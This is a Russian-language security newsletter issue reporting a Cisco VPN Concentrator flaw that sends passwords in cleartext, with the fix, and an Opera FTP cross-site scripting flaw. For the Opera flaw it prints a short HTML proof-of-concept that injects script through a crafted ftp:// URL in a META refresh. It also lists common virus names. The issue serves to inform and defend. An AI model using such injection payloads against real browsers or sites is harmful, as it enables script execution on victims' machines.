Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Новости безопасноcти компьютерных сетей


Информационный Канал Subscribe.Ru

"Безопасность - это процесс"


Выпуск 49


Уважаемые подписчики мы рады приветствовать Вас!


Уязвимость системы аутентификации Cisco VPN Concentrator

  На днях компания Cisco выпустила релиз, в котором уведомляет пользователей своих продуктов о обнаруженной уязвимости системы аутентификации концентраторов VPN серии 5000. Данная уязвимость ведет к тому, что пароли на аутентификацию передаются по каналам связи в открытом виде.

  Данная уязвимость обнаружена в:
  • Cisco VPN 5001 Concentrator
  • Cisco VPN 5002 Concentrator
  • Cisco VPN 5008 Concentrator

  И в более старых моделях
  • Cisco IntraPort 2
  • Cisco IntraPort 2+
  • Cisco IntraPort Carrier-2
  • Cisco IntraPort Carrier-8
  • Cisco IntraPort Enterprise-2
  • Cisco IntraPort Enterprise-8

  Суть уязвимости заключается в следующем. Если VPN концентратор сконфигурирован для использования аккаунтов из RADIUS сервера, то клиенты при запросе на проверку парольной информации могут использовать протоколы Password Autentication Protocol (PAP) либо его модифицированную версию Challenge. В случае ошибки аутентификации при повторной посылке пароль не шифруется, а передается в виде плоского текста. Данная уязвимость будет устранена, если в качестве протокола аутентификации используется CHAP.
  Для устранения обнаруженной уязвимости настоятельно рекомендуется произвести апгрейд до версий 6.0.21.0003 и 5.2.23.0004 или более поздних. Для этого воспользуйтесь инструкцией от фирмы производителя. Либо изменить настройки рабочей среды концентратора. Для этого значение параметра (PrimRetries), задающего количество попыток аутентификации пользователя на сервере RADIUS, равным единице.


Уязвимость браузера Opera

  В новостных рассылках по безопасности появилось сообщение от Eiji James Yoshida об обнаруженной им уязвимости ftp клиента популярного коммерческого браузера Орera версий 6.0, 6.0.1 - 6.0.4 для Windows и 6.0.1 для Linux.
  Данная уязвимость может использоваться для атаки типа "cross-site scripting", и является следствием некорректной обработки тега title . Атакующий может слегкостью вставить в данный тег исполняемый скрипт, все инструкции которого будут реализованы. ниже приведен пример реализации данной атаки. Внимание, приведенный пример, служит только для ознакомления

(html)
(head)
(META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@[FTPserver]/")
(/head)
(body)
(script>window.open("ftp://[FTPserver]/");(/script)
(/body)
(/html)


Example:
(html)
(head)
(META http-equiv="Refresh" content="5 ;
url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@ftp.opera.com/")
(/head)
(body)
(script>window.open("ftp://ftp.opera.com/");(/scrip)
(/body)
(/html)

  На данный момент фирма Ореrа не предоставила патча устраняющего эту уязвимость.


Вирусы

  Со времени выхода предыдущего номера рассылки в диком виде не было обнаружено новых опасных вирусов.
  Приводим список 10 наиболее распространенных вирусов:
  1. WORM_KLEZ.H
  2. PE_FUNLOVE.4099
  3. WORM_SIRCAM.A
  4. WORM_HIBRIS.B
  5. PE_ELKERN.D
  6. HTML_IFRMEXP.GEN
  7. WORM_YAHA.E
  8. PE_MAGISTR.A
  9. WORM_KLEZ.E
  10. JS_NOCLOSE.E

  Осуществить бесплатное сканирование своего компьютера на наличие вирусов можно, воспользовавшись утилитой онлайнового сканирования.


Новости сайта FIREBOX.RU

  На сайте www.firebox.ru размещена статья с результатами группового теста аппаратных межсетевых экранов выпускаемых компаниями Cisco, Nokia, WatchGuard, SonicWall, Symantec, Webscreen. Общий объем статьи не укладывается в формат выпускаемой нами рассылки. С ней можно ознакомиться по адресу http://www.firebox.ru/ibc_2.html



  Дополнительную информацию можно получить, направив запрос автору рассылки.
  С уважением, Игорь Камолов.

.


http://subscribe.ru/
E-mail: ask@subscribe.ru
Отписаться
Убрать рекламу

В избранное